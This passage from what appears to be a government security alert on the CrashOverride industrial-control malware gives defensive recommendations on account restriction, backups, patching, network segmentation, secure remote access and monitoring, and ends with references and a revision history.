session;Remove unnecessary accounts, groups, and restrict root access;Control and limit local administration; andMake use of the Protected Users Active Directory group in Windows Domains to further secure privileged user accounts against pass-the-hash attacks.Handling Destructive MalwareDestructive malware continues to be a threat to both critical infrastructure and business systems. NCCIC encourages organizations to review the ICS-CERT destructive malware white paper for detailed mitigation guidance. It is important for organizations to maintain backups of key data, systems, and configurations such as:Server gold images,ICS Workstation gold configurations,Engineering workstation images,PLC/RTU configurations,Passwords and configuration information, andOffline copies of install media for operating systems and control applications.Ensure Proper Configuration/Patch ManagementAdversaries often target unpatched systems. A configuration/patch management program centered on the safe importation and implementation of trusted patches will help render control systems more secure.Such a program will start with an accurate baseline and asset inventory to track what patches are needed. The program will prioritize patching and configuration management of “PC-architecture” machines used in HMI, database server, and engineering workstation roles, as current adversaries have significant cyber capabilities against these systems. Infected laptops are a significant malware vector. Such a program will limit the connection of external laptops to the control network and ideally supply vendors with known-good company laptops. The program will also encourage initial installation of any updates onto a test system that includes malware detection features before the updates are installed on operational systems.NCCIC recommends that operators:Use best practices when downloading software and patches destined for their control network;Take measures to avoid watering hole attacks;Use a web Domain Name System (DNS) reputation system;Obtain and apply updates from authenticated vendor sites;Validate the authenticity of downloads;Insist that vendors digitally sign updates, and/or publish hashes via an out-of-bound communications path, and only use this path to authenticate;Never load updates from unverified sources; andReduce your attack surface area.To the greatest extent possible, NCCIC recommends that operators:Isolate ICS networks from any untrusted networks, especially the Internet;Lock down all unused ports;Turn off all unused services; andOnly allow real-time connectivity to external networks if there is a defined business requirement or control function.If one-way communication can accomplish a task, operators should use optical separation (“data diode”).If bidirectional communication is necessary, operators should use a single open port over a restricted network path.Build a Defendable EnvironmentBuilding a defendable environment will help limit the impact from network perimeter breaches. NCCIC recommends operators segment networks into logical enclaves and restrict host-to-host communications paths. This can prevent adversaries from expanding their access, while allowing the normal system communications to continue operating. Enclaving limits possible damage, as threat actors cannot use compromised systems to reach and contaminate systems in other enclaves. Containment provided by enclaving also makes incident cleanup significantly less costly.If one-way data transfer from a secure zone to a less secure zone is required, operators should consider using approved removable media instead of a network connection. If real-time data transfer is required, operators should consider using optical separation technologies. This allows replication of data without placing the control system at risk.Additional details on effective strategies for building a defendable ICS network can be found in the ICS-CERT Defense-in-Depth Recommended Practice.Implement Secure Remote AccessSome adversaries are effective at gaining remote access into control systems, finding obscure access vectors, even “hidden back doors” intentionally created by system operators. Operators should remove such accesses wherever possible, especially modems, as these are fundamentally insecure.Operators should:Limit any accesses that remain;Where possible, implement “monitoring only” access enforced by data diodes, and not rely on “read only” access enforced by software configurations or permissions;Not allow remote persistent vendor connections into the control network;Require any remote access to be operator controlled, time limited, and procedurally similar to “lock out, tag out”;Use the same remote access paths for vendor and employee connections; do not allow double standards; andUse two-factor authentication if possible, avoiding schemes where both tokens are similar and can be easily stolen (e.g., password and soft certificate).Monitor and RespondDefending a network against modern threats requires actively monitoring for adversarial penetration and quickly executing a prepared response. Operators should:Consider establishing monitoring programs in the following key places: at the Internet boundary; at the business to Control DMZ boundary; at the Control DMZ to control LAN boundary; and inside the Control LAN;Watch IP traffic on ICS boundaries for abnormal or suspicious communications;Monitor IP traffic within the control network for malicious connections or content;Use host-based products to detect malicious software and attack attempts;Use login analysis (e.g., time and place) to detect stolen credential usage or improper access, verifying all anomalies with quick phone calls;Watch account and user administration actions to detect access control manipulation;Have a response plan for when adversarial activity is detected; andSuch a plan may include disconnecting all Internet connections, running a properly scoped search for malware, disabling affected user accounts, isolating suspect systems, and immediately resetting 100 percent of passwords.Such a plan may also define escalation triggers and actions, including incident response, investigation, and public affairs activities.Have a restoration plan, including “gold disks” ready to restore systems to known good states. References [1] ESET: WIN32/INDUSTROYER – A New Threat for Industrial Control Systems [2] Dragos: CRASHOVERRIDE Revision History June 12, 2017: Initial Release June 13, 2017: Updated IOCs (both STIX and CSV formats) July 7, 2017: Updated IOCs (both STIX and CSV formats) July 21, 2017: Corrected typographical error July 24, 2017: Corrected links to downloadable IOC files This product is provided subject to this Notification and this Privacy & Use policy. […]

News (DARKReading, The Hacker News, Threatpost)